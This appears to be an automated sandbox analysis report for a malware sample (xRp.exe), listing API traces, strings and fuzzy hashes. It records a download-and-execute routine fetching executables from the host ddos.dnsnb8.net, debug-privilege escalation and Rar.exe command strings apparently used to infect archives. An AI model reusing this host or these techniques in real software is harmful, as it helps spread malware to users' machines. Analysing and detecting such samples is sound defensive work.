Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: File$Virtual$AllocChangeCloseCreateExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$\NN`NN
API String ID: 1914996623-3151157146
Opcode ID: 381c50c9ac3146a720c46adbb552bef7fe50b59084a02df6d1c9697682d88f1d
Instruction ID: 026a45342362f1b6204e004c039ac945caea23ced6dfa1ffa1609ed33b3ced0d
Opcode Fuzzy Hash: 381c50c9ac3146a720c46adbb552bef7fe50b59084a02df6d1c9697682d88f1d
Instruction Fuzzy Hash: 1E515D71941299AFCB219F99CCC8ABEBBB8FB04356F10457AF515E72A0C3749E40CB58

Function 004E1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894

WinExec.KERNEL32(?,00000005), ref: 004E10F1
lstrlen.KERNEL32(004E4748), ref: 004E10FA
wsprintfA.USER32 ref: 004E112A
wsprintfA.USER32 ref: 004E1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 004E115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 004E1169
Sleep.KERNEL32 ref: 004E1179

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E1119
http://%s:%d/%s/%s, xrefs: 004E10C2, 004E1141
cj/, xrefs: 004E1135
ddos.dnsnb8.net, xrefs: 004E10C8, 004E10CF, 004E1140, 004E1168
%s%.8X.exe, xrefs: 004E1124
HGN, xrefs: 004E112C

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGN$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-845689471
Opcode ID: 0db5e2dedaeb7db008316c00cf7333afb886a5e8b0dff83cd634f8511b89d892
Instruction ID: 3e09ee5303e8da375a28310b1c647a6e531f4b709ccc3a9d5dc236ad296e8e23
Opcode Fuzzy Hash: 0db5e2dedaeb7db008316c00cf7333afb886a5e8b0dff83cd634f8511b89d892
Instruction Fuzzy Hash: 1F21A671D001C8BACB11DBA1DC88BAFBB7CAB45317F1140A6E100A7162D7785B44CF58

Function 004E1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 004E164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 004E165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,00000104), ref: 004E166E
CreateThread.KERNEL32(00000000,00000000,004E1099,00000000,00000000,00000000), ref: 004E16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 004E16BD

Part of subcall function 004E139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E13BC
Part of subcall function 004E139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004E13DA
Part of subcall function 004E139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004E1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E16E5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E1644
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E1662, 004E1667, 004E16DD
Documents and Settings, xrefs: 004E1696
C:\Windows\system32, xrefs: 004E1656

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-717810370
Opcode ID: e68519f31ddf66cba6fe373c6d82a5d5ba4122cce44dd2530a69437980282c4c
Instruction ID: 8bfc4337bdbca881232ee67ac0aac02315bb8ff00eae03670ee16a610ab98cab
Opcode Fuzzy Hash: e68519f31ddf66cba6fe373c6d82a5d5ba4122cce44dd2530a69437980282c4c
Instruction Fuzzy Hash: 3B11B4715801D47BCB226BA39D8DEAB3F6DEB85767F100066F2099A076C6788540C7AD

Function 004E1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGN,http://%s:%d/%s/%s,004E10E8,?), ref: 004E1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 004E1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 004E1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 004E104B
UnmapViewOfFile.KERNEL32(00000000), ref: 004E1075
CloseHandle.KERNEL32(?), ref: 004E108B
CloseHandle.KERNEL32(00000000), ref: 004E108E

Strings

http://%s:%d/%s/%s, xrefs: 004E1000
ddos.dnsnb8.net, xrefs: 004E1026
HGN, xrefs: 004E1001

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HGN$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3975667283
Opcode ID: 48dbff914e9eea6dae79ccae72959fa994a1388bdeafda1574a3bdef35420018
Instruction ID: 37ef39f599d17b384bde9bad8b339f3199618aa7f2d1efbcc258bcbfffe5bba1
Opcode Fuzzy Hash: 48dbff914e9eea6dae79ccae72959fa994a1388bdeafda1574a3bdef35420018
Instruction Fuzzy Hash: C901A17154028CBFE7316F619CC8E3BBBACEB407AAF00053AF244A75A1D6745E448B68

Function 004E2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004E2C57

Part of subcall function 004E1973: PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
Part of subcall function 004E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
Part of subcall function 004E1973: Sleep.KERNEL32(00000064), ref: 004E19C6
Part of subcall function 004E1973: wsprintfA.USER32 ref: 004E19EC
Part of subcall function 004E1973: GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
Part of subcall function 004E1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
Part of subcall function 004E1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 004E2C99
WaitForMultipleObjects.KERNEL32(00000001,004E16BA,00000001,000000FF,?,004E16BA,00000000), ref: 004E2CAC
VirtualFree.KERNEL32(00550000,00000000,00008000,C:\Users\user\AppData\Local\Temp\xRp.exe,004E4E5C,004E4E60,?,004E16BA,00000000), ref: 004E2CC2

Strings

C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E2C69

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: File$CreateVirtual$AllocExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
API String ID: 1898859962-1450390661
Opcode ID: 2b59df5f325b8e03ce68124f1ca2e4ad2281a272e3f0c59667daeb6b7c4f562d
Instruction ID: 49db2855e01091aaee9f3634a69d0c2469b8d49ec46d74435a12ae17e09128a2
Opcode Fuzzy Hash: 2b59df5f325b8e03ce68124f1ca2e4ad2281a272e3f0c59667daeb6b7c4f562d
Instruction Fuzzy Hash: 2D01D471A412A07BD7109BA6DC4EFAF7F5CEF41B22F204426F504DA1C2D5E89A00C3A8

Function 004E14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 004E1504
VirtualQuery.KERNEL32(004E14E1,?,0000001C), ref: 004E1525
ExitProcess.KERNEL32 ref: 004E157A

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 9334d0d7044b76006857097e60a6f6041b5002937508cb5cfc51da5c7a95cbcc
Instruction ID: d97ecb30bedd7ee3ff033f98dcf0f20fffc81b3f3cb1e4667645d4fd3da60584
Opcode Fuzzy Hash: 9334d0d7044b76006857097e60a6f6041b5002937508cb5cfc51da5c7a95cbcc
Instruction Fuzzy Hash: 7A115171D80294EFCB11DF67ACC4A7E77A8EBC8766B10403BF402DA261D23889419B59

Function 004E1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004E1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 004E1947

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 52624e0b1429b1e7486491994f3c9ad7ace31551a88d8c71c47ed2351749105f
Instruction ID: 6386549464bf0bbadc31319f03c989ddfdf829b34355fd70631163e62f8ad08f
Opcode Fuzzy Hash: 52624e0b1429b1e7486491994f3c9ad7ace31551a88d8c71c47ed2351749105f
Instruction Fuzzy Hash: 86F0A472240249ABC7208E23DC04AA777ACAB50362F00893BF516C5161E774D645CBA4

Function 004E6159 Relevance: 2.6, APIs: 2, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004E60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004E6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004E61A5

Memory Dump Source

Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 3b018b46f7bcdb94bfa7adce1a81c5c692c51ad56c0574645c35c2d92c7c6073
Instruction ID: 04b838f5a7e71136f0dee55f2aabf5170862f9c0de705f2f94448068708998fd
Opcode Fuzzy Hash: 3b018b46f7bcdb94bfa7adce1a81c5c692c51ad56c0574645c35c2d92c7c6073
Instruction Fuzzy Hash: 0211BE31600688CFCB319F58CC813DE77A1FF50302F2A401ADE899B381DA792941CB88

Non-executed Functions

Function 004E119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,004E13EF), ref: 004E11AB
OpenProcessToken.ADVAPI32(00000000,00000028,004E13EF,?,?,?,?,?,?,004E13EF), ref: 004E11BB
AdjustTokenPrivileges.ADVAPI32(004E13EF,00000000,?,00000010,00000000,00000000), ref: 004E11EB
CloseHandle.KERNEL32(004E13EF), ref: 004E11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,004E13EF), ref: 004E1203

Strings

C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E11A5

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
API String ID: 75692138-1450390661
Opcode ID: 3ca90d9652a9e809526a8521b2d26dbe4f2774d4a257da2a1f0a21dff7dd3170
Instruction ID: 825f7b421bbd97c67a3348195bd1c3c1082dc8793887257e9f4789da7188053f
Opcode Fuzzy Hash: 3ca90d9652a9e809526a8521b2d26dbe4f2774d4a257da2a1f0a21dff7dd3170
Instruction Fuzzy Hash: A70124B1D00248FFDB11DFE4DD89AAEBBB9FB08306F104469E606A6251D7709F449F54

Function 004E139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004E13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004E1448

Part of subcall function 004E119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,004E13EF), ref: 004E11AB
Part of subcall function 004E119F: OpenProcessToken.ADVAPI32(00000000,00000028,004E13EF,?,?,?,?,?,?,004E13EF), ref: 004E11BB
Part of subcall function 004E119F: AdjustTokenPrivileges.ADVAPI32(004E13EF,00000000,?,00000010,00000000,00000000), ref: 004E11EB
Part of subcall function 004E119F: CloseHandle.KERNEL32(004E13EF), ref: 004E11FA
Part of subcall function 004E119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,004E13EF), ref: 004E1203

Strings

C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E13A8
SeDebugPrivilege, xrefs: 004E13D3

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SeDebugPrivilege
API String ID: 4123949106-2008642442
Opcode ID: 73162040ba295be6b7cc1ee5c3e3311ef6d6ffe2798e6953619711cbecaed207
Instruction ID: b21467997745f33b8366a57d5144dd8bc079be13a6614cf0cfa89ba9a1dc38db
Opcode Fuzzy Hash: 73162040ba295be6b7cc1ee5c3e3311ef6d6ffe2798e6953619711cbecaed207
Instruction Fuzzy Hash: 8A316471E80289AAEF20DBA78C45FEFBBB8EB44706F10416BE505B3291D6345E45CB64

Function 004E239D Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 239sleepstringfileCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004E23CC
GetFileSize.KERNEL32(00000000,00000000), ref: 004E2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 004E24A8
memset.MSVCRT ref: 004E24B9
strrchr.MSVCRT ref: 004E24C9
wsprintfA.USER32 ref: 004E24DE
strrchr.MSVCRT ref: 004E24ED
memset.MSVCRT ref: 004E24F2
memset.MSVCRT ref: 004E2505
wsprintfA.USER32 ref: 004E2524
Sleep.KERNEL32(000007D0), ref: 004E2535
Sleep.KERNEL32(000007D0), ref: 004E255D
memset.MSVCRT ref: 004E256E
wsprintfA.USER32 ref: 004E2585
memset.MSVCRT ref: 004E25A6
wsprintfA.USER32 ref: 004E25CA
Sleep.KERNEL32(000007D0), ref: 004E25D0
Sleep.KERNEL32(000007D0,?,?), ref: 004E25E5
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 004E2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 004E2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 004E265B
SetEndOfFile.KERNEL32 ref: 004E266D
CloseHandle.KERNEL32(00000000), ref: 004E2676
RemoveDirectoryA.KERNEL32(?), ref: 004E2681

Strings

%s X -ibck "%s" "%s\", xrefs: 004E251E
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 004E25C4
C:\Users\user\AppData\Local\Temp\, xrefs: 004E23B1, 004E23B6, 004E24CD
%s\, xrefs: 004E257F
-ibck, xrefs: 004E25BA
%s%s, xrefs: 004E24D8

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: memset$FileSleepwsprintf$CloseHandle$strrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 1773796546-2169341206
Opcode ID: c1678f9e6f916fcbdb579e0133362a78faa4617d74b6829b0b1244940992502f
Instruction ID: 782b20cfcdcd920572614da1dbe10f1b293a4ceb5d0e64896b2491c9f205d3f4
Opcode Fuzzy Hash: c1678f9e6f916fcbdb579e0133362a78faa4617d74b6829b0b1244940992502f
Instruction Fuzzy Hash: 7681D2B1504384BBD710DF62DC89FAB77ACEF84706F00092AF644D7191D7B89A498B6A

Function 004E274A Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 83COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004E2766
memset.MSVCRT ref: 004E2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 004E2787
wsprintfA.USER32 ref: 004E27AB

Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894

wsprintfA.USER32 ref: 004E27C6
wsprintfA.USER32 ref: 004E27F4

Part of subcall function 004E1973: PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
Part of subcall function 004E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
Part of subcall function 004E1973: Sleep.KERNEL32(00000064), ref: 004E19C6
Part of subcall function 004E1973: wsprintfA.USER32 ref: 004E19EC
Part of subcall function 004E1973: GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
Part of subcall function 004E1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
Part of subcall function 004E1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004E27B6
%s%s, xrefs: 004E27A5
\WinRAR\Rar.exe, xrefs: 004E2793
C:\Windows\system32, xrefs: 004E27E3
%s%.8x.exe, xrefs: 004E27BB
%s\%s, xrefs: 004E27EE
c_31892.nls, xrefs: 004E27DE

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: File$wsprintf$PathTimememsetrandsrand$AllocCreateExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 842543849-3961832207
Opcode ID: 1ce5a2e6b3e05171c2b2466d9fe6213ff09869c3632e1f4c88c1c71c67514f08
Instruction ID: 3bf56bd169d2892b39eca13ae70b6d5419cfad1b8e51b3be0a0b8fc8e386c2e2
Opcode Fuzzy Hash: 1ce5a2e6b3e05171c2b2466d9fe6213ff09869c3632e1f4c88c1c71c67514f08
Instruction Fuzzy Hash: DF2158B6D402587BD711EBA69CCDFE7736CEB0474AF0005E6B644E3042E6B89F444A68

Function 004E120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,004E1400), ref: 004E1226
6CC16DE0.KERNEL32(00000000,?,?,?,?,004E1400), ref: 004E122D
GetCurrentProcessId.KERNEL32(?,?,?,?,004E1400), ref: 004E123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,004E1400), ref: 004E1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,004E1400), ref: 004E130A

Strings

ZwQuerySystemInformation, xrefs: 004E1212
ntdll.dll, xrefs: 004E1219
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E1262

Memory Dump Source

Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AllocCloseCurrentModuleOpen
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1236055466-3769353041
Opcode ID: 6380804735864a253ff78233ed43a412a2dbd43a621f9313a8772efb1deb38ed
Instruction ID: 87af08e0588fbfd93da62537dbd18c0378346613878ac30dc719f4a92622bf7f
Opcode Fuzzy Hash: 6380804735864a253ff78233ed43a412a2dbd43a621f9313a8772efb1deb38ed
Instruction Fuzzy Hash: 04210530644391ABD7219F56CC48F6BBAA8FB45B02F00096AF645FB250C374DA4087AD

Function 004E1581 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
